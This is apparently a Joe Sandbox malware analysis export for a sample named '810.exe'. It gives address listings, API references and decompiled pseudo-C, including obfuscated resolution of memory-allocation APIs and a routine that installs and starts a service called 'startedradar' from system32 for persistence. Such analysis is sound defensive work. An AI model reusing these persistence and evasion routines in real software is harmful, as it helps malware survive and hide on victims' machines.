0x00405a20
0x00405a20
0x00405a23
0x00405a25
0x00406277
0x00406277
0x0040627a
0x00000000
0x00405a2b
0x00405a2b
0x00405a2b
0x00405a30
0x00405a32
0x00405a36
0x00405a39
0x00405a3b
0x00405a44
0x00405a3d
0x00405a3d
0x00405a3f
0x00405a3f
0x00405a46
0x00405a4b
0x00405a4b
0x00405a54
0x00405a59
0x00405a5b
0x00405a5e
0x00405a61
0x00405a63
0x00405a66
0x00000000
0x00405a66
0x00405a08
0x00405a08
0x00405a08
0x00405a0b
0x00405a12
0x00000000
0x00405a12
0x00000000
0x00405a06
0x004059f3
0x004059f3
0x004059f8
0x00000000
0x00405992
0x00405992
0x00405992
0x00405995
0x004059b8
0x004059b8
0x004059bb
0x004059be
0x004059c1
0x004059c4
0x004059cc
0x004059cf
0x004059d2
0x004059d5
0x00406265
0x00406265
0x0040626c
0x00000000
0x004059db
0x004059db
0x004059de
0x004059e1
0x004059e6
0x004059e7
0x00000000
0x004059e7
0x00405997
0x00405997
0x00405997
0x00405997
0x0040599a
0x00000000
0x00000000
0x004059a0
0x004059a5
0x004059a7
0x004059a8
0x004059aa
0x004059ad
0x004059b0
0x004059b3
0x004059b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004059b6
0x0040625a
0x0040625a
0x00000000
0x0040625a
0x00405995
0x00000000
0x00405990
0x00000000
0x00405986
0x004058b7
0x004058b7
0x004058b7
0x004058b7
0x004058ba
0x00000000
0x00000000
0x004058c0
0x004058c5
0x004058c7
0x004058ca
0x004058cc
0x004058cf
0x004058d2
0x004058d5
0x004058d8
0x004058da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004058da
0x00406239
0x00406239
0x00000000
0x00406239
0x004058b5
0x0040586e
0x0040586e
0x0040586e
0x0040586e
0x00405871
0x00000000
0x00000000
0x00405877
0x0040587c
0x0040587e
0x0040587f
0x00405881
0x00405884
0x00405887
0x0040588a
0x0040588d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040588d
0x0040622e
0x0040622e
0x00406422
0x00406422
0x0040642b
0x00406430
0x00406430
0x00406433
0x00406436
0x00406439
0x0040643b
0x0040643b
0x0040643e
0x00406440
0x0040644d
0x0040644d
0x00406450
0x00406452
0x00406454
0x00406454
0x00406454
0x00406457
0x00000000
0x00000000
0x00406459
0x00406459
0x0040645a
0x0040645d
0x0040645f
0x00000000
0x00000000
0x00000000
0x0040645f
0x00406454
0x00406452
0x0040643e
0x00406439
0x00000000
0x0040586c
0x004062b1
0x004062b3
0x004062b6
0x004062b8
0x004062e2
0x004062e2
0x004062e7
0x004062ea
0x004062ec
0x004062ee
0x004062f1
0x004062f3
0x004062f5
0x004062f5
0x004062f5
0x004062f8
0x00000000
0x00000000
0x004062fa
0x004062fa
0x004062fb
0x004062fe
0x00406300
0x00000000
0x00000000
0x00000000
0x00406300
0x004062f5
0x00406302
0x00406307
0x00406307
0x0040630b
0x0040630e
0x00406311
0x00406314
0x00406316
0x00406319
0x0040631d
0x00406320
0x00406324
0x00406442
0x00406442
0x00406442
0x00406444
0x0040644a
0x0040644a
0x00000000
0x0040632a
0x0040632a
0x0040632a
0x004063f3
0x004063f3
0x004063f3
0x004063f6
0x004063f9
0x00000000
0x00000000
0x004063fb
0x004063fb
0x004063fd
0x0040640a
0x0040640a
0x0040640d
0x00406410
0x004063d7
0x004063d7
0x004063dd
0x004063dd
0x004063e0
0x00000000
0x00406412
0x00406412
0x004063ba
0x004063ba
0x004063ba
0x004063bd
0x00000000
0x00000000
0x004063bf
0x004063c4
0x004063c6
0x004063c9
0x004063cb
0x004063cc
0x004063cf
0x004063d2
0x00000000
0x004063d4
0x004063d4
0x004063d4
0x00000000
0x004063d4
0x00000000
0x004063d2
0x0040641c
0x0040641c
0x00000000
0x0040641c
0x004063ff
0x004063ff
0x004063ff
0x00406402
0x00406414
0x00406414
0x00000000
0x00406404
0x00406404
0x00406404
0x00406407
0x004063e3
0x004063e3
0x004063ec
0x004063ef
0x004063ef
0x004063f0
0x00000000
0x004063f0
0x00406402
0x00000000
0x004063fd
0x00000000
0x004063f3
0x004062c0
0x00000000
0x004062c0
0x004062c0
0x004062c0
0x004062c3
0x00000000
0x00000000
0x004062c9
0x004062ce
0x004062d0
0x004062d3
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004062e0
0x004063b2
0x004063b2
0x00000000
0x004063b2
0x004062b8
0x00405685
0x00405685
0x00405685
0x00405688
0x0040568a
0x0040568e
0x00405690
0x00405693
0x00405696
0x0040569e
0x004056a3
0x004056a6
0x004056a6
0x004056a9
0x004056a9
0x004056b3
0x004056bb
0x004056be
0x004056c0
0x004056c9
0x004056c9
0x004056ce
0x004056cf
0x004056d0
0x004056d1
0x004056d1
0x004056d5
0x004056d7
0x004056dd
0x004056e5
0x004056e5
0x004056e9
0x004056ec
0x004056c2
0x004056c2
0x004056c4
0x004056c4
0x004056ef
0x004056ef
0x004056f2
0x004056f4
0x004056f9
0x004056fc
0x004056fe
0x00405701
0x00405707
0x00405847
0x00405847
0x00405847
0x00405847
0x00000000
0x0040570d
0x0040570d
0x0040570d
0x00405710
0x00405716
0x00405719
0x004055e8
0x004055e8
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x00000000
0x004055f0
0x0040556e
0x0040556e
0x0040556e
0x00405572
0x00405577
0x00405578
0x0040557a
0x0040557c
0x0040557f
0x00405582
0x00405584
0x004055d6
0x004055d6
0x004055db
0x004055df
0x004055e2
0x004055e2
0x004055e5
0x004055e5
0x004055e5
0x004055e5
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x00000000
0x004055f0
0x004055b1
0x004055b1
0x004055b4
0x004055b7
0x004055ba
0x004055bd
0x004055c0
0x004055c0
0x004055c4
0x004055c9
0x004055ca
0x004055cc
0x004055ce
0x004055d1
0x004055d4
0x00000000
0x00000000
0x00000000
0x004055d4
0x00405707
0x0040567f
0x00406461
0x00406461
0x00406464
0x00406466
0x0040646b
0x0040646e
0x00406471
0x00406474
0x00406476
0x00406479
0x00406483
0x0040648e
0x00406491
0x00406495
0x0040649b
0x004064a1
0x004064a7
0x004064aa
0x004064ad
0x004064b2
0x004064b5
0x004064b7
0x004064bd
0x004064bd
0x004064bf
0x004064c5
0x004064c5
0x004064cf
0x004064d5
0x004064de
0x004064e1
0x004064e4
0x004064e6
0x004064ea
0x004064ed
0x004064f3
0x004064f3
0x004064f5
0x004064f5
0x004064f5
0x004064f7
0x004064fa
0x004064fd
0x00406503
0x00406503
0x00406508
0x00406509
0x0040650a
0x0040650b
0x0040650b
0x0040650b
0x00406510
0x00406510
0x00406513
0x00406516
0x00406521
0x0040652c
0x00406537
0x00406542
0x0040654d
0x00406558
0x00406563
0x00406568
0x0040656b
0x0040656d
0x00406572
0x00406574
0x00406574
0x00406579
0x0040657c
0x0040657c
0x0040657f
0x0040657f
0x00406581
0x00406584
0x00406586
0x00406588
0x0040658c
0x0040658f
0x00406591
0x00406591
0x00406596
0x0040659e
0x004065a2
0x004065a2
0x004065a6
0x004065b0
0x004065b0
0x004065b3
0x004065b5
0x004065b9
0x004065bb
0x004065be
0x004065c0
0x004065c2
0x004065c2
0x004065c2
0x004065c5
0x004065c8
0x004065cb
0x004065ce
0x004065d1
0x004065d1
0x004065d4
0x004065d4
0x004065d6
0x004065d8
0x004065de
0x004065e0
0x004065e2
0x004065e2
0x004065e3
0x004065e3
0x004065e6
0x004065e9
0x004065eb
0x004065eb
0x004065eb
0x004065ed
0x004065f2
0x004065fd
0x00406609
0x0040660f
0x00406611
0x00406611
0x00406611
0x00406614
0x00406619
0x0040661c
0x0040661c
0x00406625
0x0040662a
0x0040662a
0x0040662b
0x0040662e
0x00406630
0x00406633
0x00406635
0x00406637
0x0040663b
0x0040663d
0x00406645
0x00406645
0x00406645
0x0040663b
0x00406635
0x004064bf
0x00406648
0x00406650
0x00000000
0x0040571e
0x0040571e
0x00405721
0x004057d3
0x004057da
0x004057e2
0x004057e5
0x004057e7
0x004057f8
0x004057f8
0x004057fd
0x004057fe
0x004057ff
0x00405800
0x00405800
0x00405804
0x00405806
0x0040580c
0x00405814
0x00405814
0x00405818
0x0040581b
0x004057e9
0x004057e9
0x004057eb
0x004057ee
0x004057f3
0x004057f3
0x0040581e
0x0040581e
0x00405820
0x00405822
0x00405825
0x00405828
0x0040582e
0x00000000
0x00405830
0x00405830
0x00405830
0x00405833
0x00405836
0x0040621c
0x0040621c
0x00406223
0x00000000
0x0040583c
0x0040583c
0x0040583c
0x0040583f
0x00000000
0x0040583f
0x00405836
0x00405727
0x00405727
0x00405727
0x0040572a
0x004057af
0x004057af
0x004057b6
0x004057b9
0x004057be
0x004057c4
0x004057c7
0x004057ca
0x004057ca
0x004057cd
0x00000000
0x00405730
0x00405730
0x00405730
0x00405732
0x00405737
0x0040573f
0x00405741
0x00405754
0x00405754
0x00405757
0x00000000
0x00405759
0x00405759
0x0040575e
0x00405761
0x00405761
0x0040576f
0x0040577a
0x0040577b
0x0040577e
0x00405780
0x00000000
0x00000000
0x00405782
0x00405782
0x00405785
0x00405787
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405787
0x00000000
0x00405761
0x00405743
0x00405743
0x00405743
0x00405746
0x00405748
0x00405789
0x00405789
0x0040578c
0x0040578c
0x0040578f
0x00406211
0x00406211
0x00000000
0x00000000
0x00000000
0x00000000
0x0040574a
0x0040574a
0x0040574a
0x0040574c
0x004057d0
0x004057d0
0x00000000
0x00405752
0x00405752
0x00000000
0x00405752
0x0040574c
0x00405748
0x00000000
0x00405795
0x00405798
0x0040579a
0x0040579c
0x0040579d
0x0040579f
0x004057a2
0x004057a5
0x004057a8
0x004057a8
0x00000000
0x004057ad
0x0040572a
0x00000000
0x00405721
0x004055e8
0x00405c54
0x00405c63
0x00405c6d
0x00405c83
0x00405c99
0x00405ca2
0x00405ca7
0x00405caa
0x00405cad
0x00405cb2
0x00405cb4
0x00405cb4
0x00405cc0
0x00405cc0
0x00405cc0
0x00405cc4
0x00405cc5
0x00405ccc
0x00405cc0
0x00405cd0
0x00405cd0
0x00405cd5
0x00405cd6
0x00405cd7
0x00405cd8
0x00405cd9
0x00405cd9
0x00405cdf
0x00405ce5
0x00405ce8
0x00405cf0
0x00405cf0
0x00405cf0
0x00405cf9
0x00405cfb
0x00405cfd
0x00405d04
0x00405d07
0x00405d10
0x00405d17
0x00405d19
0x00405d1c
0x00405d25
0x00405d27
0x00405d2e
0x00405d31
0x00405d3c
0x00405d3f
0x00405d45
0x00405d48
0x00405d51
0x00405d5c
0x00405d5c
0x00405d5f
0x00405d66
0x00405d70
0x00405d76
0x00405d76
0x00405d80
0x00405d80
0x00405d85
0x00405d85
0x00405d89
0x00405d8e
0x00405d94
0x00405d94
0x00405d9b
0x00405d9f
0x00405da6
0x00405dab
0x00000000
0x00405db0
0x00405db0
0x00405dbb
0x00405dbe
0x00405dbf
0x00405dc1
0x00405dc4
0x00405dc8
0x00405dc8
0x00405dcb
0x00405dce
0x00405e1d
0x00405e2d
0x00405e30
0x00405e33
0x00405e36
0x00405e39
0x00405e3c
0x00405e3e
0x00405e43
0x00405e46
0x00405e48
0x00405e48
0x00405e4b
0x00405e4e
0x00405e4e
0x00405e51
0x00405e51
0x00405e54
0x00405e57
0x00405e59
0x00405e59
0x00405e59
0x00405e5c
0x00405e5f
0x00405e62
0x00405e62
0x00405e62
0x00405e70
0x00405e75
0x00405e79
0x00405e7c
0x00405e94
0x00405e7e
0x00405e81
0x00405e85
0x00405e88
0x00405e8a
0x00405e8d
0x00405e90
0x00405e90
0x00405e97
0x00405e97
0x00405e97
0x00405e97
0x00405e97
0x00405e9c
0x00405e9f
0x00405e9f
0x00405ea1
0x00405ea6
0x00405ea6
0x00405eab
0x00405dd0
0x00405dd0
0x00405dd7
0x00405dda
0x00405de3
0x00405de9
0x00405de9
0x00405dee
0x00405def
0x00405df0
0x00405df1
0x00405df1
0x00405df6
0x00405dff
0x00405e05
0x00405e05
0x00405e05
0x00405e08
0x00405e0a
0x00405e0d
0x00405e15
0x00405e15
0x00405de3
0x00405dce
0x00405eb3
0x00405eb3
0x00405eb6
0x00405eb7
0x00405ec1
0x00405ec6
0x00405ec6
0x00405ec7
0x00405ecb
0x004060e6
0x004060e6
0x00000000
0x00405ed1
0x00405ed1
0x00405ed1
0x00405ed3
0x00405ed3
0x00405ed3
0x00405ed6
0x00405ed6
0x00405edc
0x00405ee1
0x00000000
0x00000000
0x00405ee7
0x00405eea
0x00405fa2
0x00405fa9
0x00405fb1
0x00405fb6
0x00405fc7
0x00000000
0x00405fd0
0x00405fd0
0x00405fd0
0x00405fd5
0x00405fd7
0x00405fde
0x00405fe6
0x00405fe9
0x00405fe9
0x00405fb8
0x00405fb8
0x00405fba
0x00405fbd
0x00405fc2
0x00405fc2
0x00405fed
0x00405fed
0x00405fef
0x00405ff1
0x00405ff4
0x00405ffa
0x0040600c
0x0040600c
0x0040601c
0x0040601c
0x00406023
0x00406026
0x00406028
0x00406050
0x0040605e
0x00406061
0x00406068
0x0040606b
0x0040606d
0x00406071
0x00406074
0x00406077
0x00406083
0x00406083
0x00406079
0x00406079
0x00406079
0x00406085
0x00406090
0x00406099
0x0040609c
0x0040609e
0x00405ed3
0x00405ed3
0x00000000
0x0040602a
0x0040602a
0x0040602a
0x0040602a
0x0040602d
0x00000000
0x00000000
0x00406033
0x00406038
0x0040603a
0x0040603b
0x0040603e
0x00406040
0x00406043
0x00406046
0x00406049
0x0040604b
0x00000000
0x0040604d
0x0040604d
0x0040604d
0x00000000
0x0040604d
0x00000000
0x0040604b
0x004062a6
0x004062a6
0x00000000
0x004062a6
0x0040600e
0x0040600e
0x0040600e
0x00406011
0x00406013
0x00406388
0x00406388
0x0040638b
0x00000000
0x00406019
0x00406019
0x00406019
0x00000000
0x00406019
0x00406013
0x00405ffc
0x00405ffc
0x00405ffc
0x00405fff
0x00406006
0x00000000
0x00406006
0x00405ef0
0x00405ef0
0x00405ef8
0x00405f7e
0x00405f7e
0x00405f85
0x00405f88
0x00405f8d
0x00405f93
0x00405f96
0x00405f99
0x00405f99
0x00405f9c
0x00000000
0x00405efe
0x00405efe
0x00405efe
0x00405f00
0x00405f05
0x00405f0f
0x00405f22
0x00405f22
0x00405f25
0x00000000
0x00405f27
0x00405f27
0x00405f2c
0x00405f2c
0x00405f30
0x00405f30
0x00405f3e
0x00405f49
0x00405f4a
0x00405f4d
0x00405f4f
0x00000000
0x00000000
0x00405f51
0x00405f51
0x00405f54
0x00405f56
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f56
0x00000000
0x00405f30
0x00405f11
0x00405f11
0x00405f11
0x00405f16
0x00405f58
0x00405f58
0x00405f5b
0x00405f5e
0x0040629b
0x0040629b
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f18
0x00405f18
0x00405f1a
0x00405f9f
0x00405f9f
0x00000000
0x00405f20
0x00405f20
0x00000000
0x00405f20
0x00405f1a
0x00405f16
0x00000000
0x00405f64
0x00405f67
0x00405f69
0x00405f6b
0x00405f6c
0x00405f6e
0x00405f71
0x00405f74
0x00405f77
0x00000000
0x00405f7c
0x00405ef8
0x00000000
0x00405eea
0x004060a6
0x004060a9
0x004060ac
0x004060ae
0x004060b0
0x00406396
0x00406396
0x00406399
0x00000000
0x004060b6
0x004060b6
0x004060c2
0x004060d3
0x004060d3
0x004060dd
0x004060e3
0x00000000
0x004060e3
0x00000000
0x004060b0
0x00405ed3
0x00406376
0x00406376
0x00406376
0x0040637d
0x00000000
0x0040637d
0x00000000
0x00405d51

APIs

memset.NTDLL ref: 00405A98
memset.NTDLL ref: 00405C6D
memset.NTDLL ref: 00405C83
memset.NTDLL ref: 00405C99

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 78a51c5e0ce33ccfa31cda13e2926cecdc4740a3c75b7f82e84302884767a798
Instruction ID: ee7d39652ebe26e707ce1dfc4e53cf744e75414dffc3c2b49a948808a1094c30
Opcode Fuzzy Hash: 78a51c5e0ce33ccfa31cda13e2926cecdc4740a3c75b7f82e84302884767a798
Instruction Fuzzy Hash: 17314FB2E10F82EBE3048B64D801BE5B770FFD9300F205316E5C5A5642EB78A694CB95

Uniqueness

Uniqueness Score: 0.00%

Analysis Process: 810.exe PID: 3520 Parent PID: 1512 810.exeUNIQUE

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.1%
Total number of Nodes:	516
Total number of Limit Nodes:	12

Executed Functions

Function 000F21B8, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 60
memorynativeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 000F2261

Strings

YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 000F21CD
y, xrefs: 000F2205
Z, xrefs: 000F220D
$, xrefs: 000F21E5
w, xrefs: 000F2211
r, xrefs: 000F2201
A, xrefs: 000F2215
l, xrefs: 000F221D
l, xrefs: 000F2221
l, xrefs: 000F2219

Memory Dump Source

Source File: 00000007.00000002.1686856986.000F0000.00000040.sdmp, Offset: 000F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f0000_810.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: $$A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2167126740-65669930
Opcode ID: b1ab00398fd01d4831b46376ca981abc8bf799d76fe64f98588500c985ffefe1
Instruction ID: 1d56381279aa5056d3e8460a3336076cb24ef3084560d67ecb54cb53c6a78067
Opcode Fuzzy Hash: b1ab00398fd01d4831b46376ca981abc8bf799d76fe64f98588500c985ffefe1
Instruction Fuzzy Hash: AC2119B0D08388DFDB00DFA8D48469EBFF1AF85314F10851EE998AB351C3B99549CB92

Uniqueness

Uniqueness Score: 3.75%

Function 0011CF86, Relevance: 13.5, APIs: 9, Instructions: 37
windowsynchronizationtimeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0011CF86
SetTimer.USER32(?,00000000), ref: 0011CF8E
GetTickCount.KERNEL32(?,00000000), ref: 0011CF94
GetTickCount.KERNEL32(?,00000000), ref: 0011CFA5
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011CFCB
TranslateMessage.USER32(?), ref: 0011CFD9
DispatchMessageW.USER32(?), ref: 0011CFE3
WaitForSingleObject.KERNEL32(00000000), ref: 0011CFF1
DestroyWindow.USER32 ref: 0011D013

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CountMessageTick$DestroyDispatchObjectSingleTimerTranslateWaitWindow
String ID:
API String ID: 1391006589-0
Opcode ID: 912c103774e9ea6820681904d42f63fb039e9e6b8767d227d423a8856fd09cd5
Instruction ID: a3888c6f83facd4c10bcfc0bd6e42fcfc7471713905b10a76db4d977f44a2033
Opcode Fuzzy Hash: 912c103774e9ea6820681904d42f63fb039e9e6b8767d227d423a8856fd09cd5
Instruction Fuzzy Hash: AA013C71900200FBD7345BB4EC8EBAE3F7AEB08706F104024F212DA9A0DB7884E39B54

Uniqueness

Uniqueness Score: 0.03%

Function 000F20FD, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61
nativeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 000F21A2

Strings

yyProtectairtual emory, xrefs: 000F2112
V, xrefs: 000F214E
w, xrefs: 000F214A
@, xrefs: 000F212A
M, xrefs: 000F2152
Z, xrefs: 000F2146

Memory Dump Source

Source File: 00000007.00000002.1686856986.000F0000.00000040.sdmp, Offset: 000F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f0000_810.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2706961497-3039725267
Opcode ID: be8e83489f5f0157cd404c5ea5f4a9d028123f043dc6ca77557c268db100e54c
Instruction ID: 12fb32f8cd67951d520cd7f181bf296127843eb288fc9f7ad864898605252f43
Opcode Fuzzy Hash: be8e83489f5f0157cd404c5ea5f4a9d028123f043dc6ca77557c268db100e54c
Instruction Fuzzy Hash: 6A21F2B0D083489FDB00DFA8C48069EBBF4EB48354F10892AE959AB391D3759A49CF51

Uniqueness

Uniqueness Score: 3.75%

Function 0011FDC9, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 56
memoryserviceUNIQUE

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E0011FDC9(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t10;
				int _t11;
				void* _t21;
				void* _t28;
				void* _t31;
				int _t32;
				void* _t34;

				_t28 = __edi;
				asm("popfd");
				asm("int3");
				_t31 = L00111D00(__ecx, __edx, __edi);
				 *0x1259dc(_t34 - 0x20c, 0x104, _t31, "C:\Windows\system32\startedradar.exe");
				HeapFree(GetProcessHeap(), 0, _t31);
				_t10 = CreateServiceW(__edi, "startedradar", "startedradar", 0x12, 0x10, 2, 0, _t34 - 0x20c, 0, 0, 0, 0, 0); // executed
				_t21 = _t10;
				if(_t21 != 0) {
					_t11 = L0011FA00(_t10, __edi, _t34 - 4, __edi); // executed
					__eflags = _t11;
					if(__eflags != 0) {
						goto 0x311e88;
						asm("int3");
						asm("int3");
						 *0x124aac();
						HeapFree(GetProcessHeap(), 0, _t31);
					}
				} else {
					asm("popfd");
					asm("int3");
					asm("int3");
					_t21 = OpenServiceW(??, ??, ??);
				}
				_t41 = _t21;
				if(_t21 == 0) {
					_t32 = 0;
					__eflags = 0;
				} else {
					_t32 = StartServiceW();
					CloseServiceHandle(_t21);
				}
				L0011FD00(_t28, _t32, _t41);
				CloseServiceHandle(_t28);
				return _t32;
			}

0x0011fdc9
0x0011fdc9
0x0011fdca
0x0011fdd0
0x0011fde4
0x0011fdf7
0x0011fe21
0x0011fe27
0x0011fe2b
0x0011fe44
0x0011fe49
0x0011fe4b
0x0011fe4d
0x0011fe52
0x0011fe53
0x0011fe54
0x0011fe64
0x0011fe64
0x0011fe2d
0x0011fe32
0x0011fe33
0x0011fe34
0x0011fe3b
0x0011fe3b
0x0011fe6a
0x0011fe6c
0x0011fe84
0x0011fe84
0x0011fe6e
0x0011fe7a
0x0011fe7c
0x0011fe7c
0x0011fe88
0x0011fe8e
0x0011fe9c

APIs

_snwprintf.NTDLL ref: 0011FDE4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011FDF0
HeapFree.KERNEL32(00000000), ref: 0011FDF7
CreateServiceW.ADVAPI32(?,startedradar,startedradar,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0011FE21
CloseServiceHandle.ADVAPI32(?,?,startedradar,startedradar,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0011FE8E

Strings

startedradar, xrefs: 0011FE16, 0011FE1B
C:\Windows\system32\startedradar.exe, xrefs: 0011FDD8

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: HeapService$CloseCreateFreeHandleProcess_snwprintf
String ID: C:\Windows\system32\startedradar.exe$startedradar
API String ID: 4287406958-2267960288
Opcode ID: 82ba2a79370ac0e5512536095df589409f0d3c2729370c9d3fd6012b4064484e
Instruction ID: c3fccf382f42c194662e14c600ee841e1432f3e508af555a1e5389972ba5fca5
Opcode Fuzzy Hash: 82ba2a79370ac0e5512536095df589409f0d3c2729370c9d3fd6012b4064484e
Instruction Fuzzy Hash: 5601F731345314B7D724A7E06D8AFFFB25C9B08751F100475FB05964C2DBA048E252A1

Uniqueness

Uniqueness Score: 100.00%

Function 0011FA77, Relevance: 4.5, APIs: 3, Instructions: 33
serviceCOMMON

Control-flow Graph

Executed
Not Executed

APIs

EnumServicesStatusExW.ADVAPI32 ref: 0011FA77
GetTickCount.KERNEL32 ref: 0011FA85
OpenServiceW.ADVAPI32(?,?,00000001), ref: 0011FABF

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CountEnumOpenServiceServicesStatusTick
String ID:
API String ID: 3995870938-0
Opcode ID: bd4017d46e79a6a077ab1b2df60fed1cfa154d5409396ee9554016b685c7c64f
Instruction ID: 4307a3ede8f85dd6d0a9a10fd12971695e851dd87a969ba8d0d4941344dda60b
Opcode Fuzzy Hash: bd4017d46e79a6a077ab1b2df60fed1cfa154d5409396ee9554016b685c7c64f
Instruction Fuzzy Hash: F9F03C32E04229DBCF298FA8D9856EDBBB4BF0C300F150539EA16B7650D73498D19E95

Uniqueness

Uniqueness Score: 0.03%

Function 0011CEB7, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
memoryregistryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E0011CEB7(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t28;
				struct HWND__* _t31;
				signed int _t34;
				long _t36;
				struct HWND__* _t54;
				void* _t56;
				void* _t58;

				asm("popfd");
				asm("int3");
				_t56 = L00111D00(__ecx, __edx, __edi);
				 *0x1259dc(_t58 - 0xd0, 0x40, _t56,  *0x125a04);
				HeapFree(GetProcessHeap(), 0, _t56);
				memset(_t58 - 0x30, 0, 0x30);
				 *(_t58 - 0x30) = 0x30;
				 *((intOrPtr*)(_t58 - 0x10)) = 1;
				 *((intOrPtr*)(_t58 - 8)) = _t58 - 0xd0;
				 *((intOrPtr*)(_t58 - 0x28)) = E0011CE70;
				 *((intOrPtr*)(_t58 - 0x1c)) = GetModuleHandleW(0);
				_t28 = RegisterClassExW(_t58 - 0x30);
				if(_t28 != 0) {
					_t31 = CreateWindowExW(0, _t58 - 0xd0, 0, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, GetModuleHandleW(0), 0); // executed
					_t54 = _t31;
					if(_t54 != 0) {
						goto 0x311990;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						SetTimer(_t54, GetTickCount(), ??, ??); // executed
						_t34 = GetTickCount();
						_t36 = GetTickCount();
						 *0x127c98 = 1;
						 *0x127c94 = _t36 + 0xbb8 + _t34 % 0xbb8;
						if(GetMessageW(_t58 - 0x4c, 0, 0, 0) > 0) {
							while(1) {
								TranslateMessage(_t58 - 0x4c);
								DispatchMessageW(_t58 - 0x4c); // executed
								if(WaitForSingleObject( *0x124c0c, 0) != 0x102) {
									goto L7;
								}
								goto 0x3119a8;
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								if(GetMessageW() > 0) {
									continue;
								}
								goto L7;
							}
						}
						L7:
						DestroyWindow(_t54); // executed
					}
					goto 0x3119c0;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t28 = UnregisterClassW();
				}
				goto 0x3119d7;
				return _t28;
			}

0x0011ceb7
0x0011ceb8
0x0011cec1
0x0011ced3
0x0011cee6
0x0011cef4
0x0011cefd
0x0011cf0a
0x0011cf11
0x0011cf14
0x0011cf23
0x0011cf2a
0x0011cf33
0x0011cf6c
0x0011cf72
0x0011cf76
0x0011cf7c
0x0011cf81
0x0011cf82
0x0011cf83
0x0011cf84
0x0011cf85
0x0011cf8e
0x0011cf94
0x0011cfa5
0x0011cfb0
0x0011cfc0
0x0011cfd3
0x0011cfd5
0x0011cfd9
0x0011cfe3
0x0011cffc
0x00000000
0x00000000
0x0011cffe
0x0011d003
0x0011d004
0x0011d005
0x0011d006
0x0011d007
0x0011d010
0x00000000
0x00000000
0x00000000
0x0011d010
0x0011cfd5
0x0011d012
0x0011d013
0x0011d013
0x0011d019
0x0011d01e
0x0011d01f
0x0011d020
0x0011d021
0x0011d022
0x0011d022
0x0011d028
0x0011d02d

APIs

_snwprintf.NTDLL ref: 0011CED3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011CEDF
HeapFree.KERNEL32(00000000), ref: 0011CEE6
memset.NTDLL ref: 0011CEF4
GetModuleHandleW.KERNEL32(00000000), ref: 0011CF1D
RegisterClassExW.USER32(00000030), ref: 0011CF2A
